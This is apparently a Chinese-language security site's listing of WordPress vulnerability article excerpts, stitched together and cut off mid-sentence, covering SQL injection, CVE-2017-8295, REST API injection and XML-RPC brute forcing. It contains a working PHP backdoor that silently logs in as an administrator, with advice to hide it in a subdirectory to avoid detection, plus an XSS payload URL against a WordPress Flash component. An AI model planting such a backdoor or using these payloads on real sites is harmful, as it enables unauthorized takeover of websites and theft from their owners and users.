权限后门系列之一:手动打造WordPress权限后门

screen 2017-12-23 at 16.19.57.jpg

WordPress统计插件Statistics SQL注入漏洞分析

今天下午的时候,看到了这个漏洞,然后复现并分析了一下。可能是理解有误,有原文有一些出入,如果有错误请不吝指出。

一、漏洞条件:

  • 插件版本<12.0.8

  • 至少需要一个订阅者账号,我测试的时候发现当前账号需要编辑或者提交文章的权限的,如果这里有错误,请指出~

二、漏洞成因:

WP-Statistics插件允许用户在页面添加shortcode(简码)用于丰富页面统计功能。


WordPress曝未经授权的密码重置漏洞(CVE-2017-8295 )

漏洞提交者:Dawid Golunski漏洞编号:CVE-2017-8295发布日期:2017-05-03修订版本:1.0漏洞危害:中/高I. 漏洞WordPress内核<= 4.7.4存在未经授权的密码重置(0day)II. 背景WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。截止2017年2月,Alexa排名前1000万的站点中约有27.5%使用该管理系统。据报道有超过6000万站点使用WordPress进行站点管理或者作为博客系统。III. 介绍

WordPress REST API 内容注入漏洞

1.漏洞信息:WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。在4.7.0版本后,REST API插件的功能被集成到WordPress中,由此也引发了一些安全性问题。近日,一个由REST API引起的影响WorePress4.7.0和4.7.1版本的漏洞被披露,该漏洞可以导致WordPress所有文章内容可以未经验证被查看,修改,删除,甚至创建新的文章,危害巨大。2.漏洞影响版本:WordPress 4.7.0 WordPress 4.7.13.复现环境:A

猥琐的wordpress后门

一个可以自动调用管理员帐号登录wordpress后台的方法。
<?php

    require('../../../wp-blog-header.php'); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。
    $query_str = "SELECT ID FROM $wpdb->users";
    $user_ids = $wpdb->get_results($query_str);
    foreach ($user_ids as $uid) {
        $user_id = $uid->ID;
        if (user_can($user_id, 'administrator')) {
            $user_info = get_userdata($user_id);
            $user_login = $user_info->user_login;
            wp_set_current_user($user_id, $user_login);


WordPress 4.5.1 XSS 0day

http://0day5.com/wp-includes/js/mediaelement/flashmediaelement.swf?jsinitfu%xnction=console.log&isvi%xdeo=true&auto%xplay=true&fi%xle=http://midzer0.github.io/2016/wordpress-4.5.1-xss/exp.m3u8

WordPress 自定义内容类型管理插件(CCTM)存在后门,可窃取管理员账号密码

wordpress

Wordbrutepress:针对WordPress XML-RPC的大型暴力破解攻击工具

通过xmlrpc暴力破解wordpress(单请求多组帐户密码)含exp

利用xmlrpc.php来进行账号的暴力破解,原文:https://blog.sucuri.net/2015/10/ ... rdpress-xmlrpc.html
只是给出POC。

以往的文章都是一请求一组账号密码的。这个是一请求多组账号密码的。一个请求里加一千组账号密码没问题。日志里也就几条xmlrpc日志。点击查看原图
通过查看官方文档写成如下EXP:

WordPress曝XSS高危漏洞,影响上百万网站

WordPress内容管理系统(CMS)刚刚发布了更新——4.2.3版本,修复一个严重的、影响数百万网站的安全漏洞。